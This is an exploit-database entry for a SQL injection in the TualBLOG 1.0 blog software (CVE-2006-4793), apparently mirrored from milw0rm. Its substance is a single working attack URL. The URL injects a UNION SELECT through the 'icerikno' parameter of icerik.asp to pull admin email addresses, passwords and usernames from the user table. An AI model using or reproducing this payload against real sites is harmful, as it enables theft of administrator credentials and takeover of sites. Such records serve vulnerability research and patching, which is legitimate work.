TualBLOG 1.0 - 'icerikno' SQL Injection
| EKU-ID: 10367 | CVE: OSVDB-28787;CVE-2006-4793 | OSVDB-ID: |
| Author: RMx | Published: 2006-09-13 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 10367 | CVE: OSVDB-28787;CVE-2006-4793 | OSVDB-ID: |
| Author: RMx | Published: 2006-09-13 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# BiyoSecurity.Org # script name : TualBLOG v 1.0 # Risk : High # Regards : Dj ReMix # Thanks : Korsan , Liz0zim # Vulnerable file : icerik.asp exp : http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1 uyeno = 1 or 2( Admin ID ) # milw0rm.com [2006-09-13]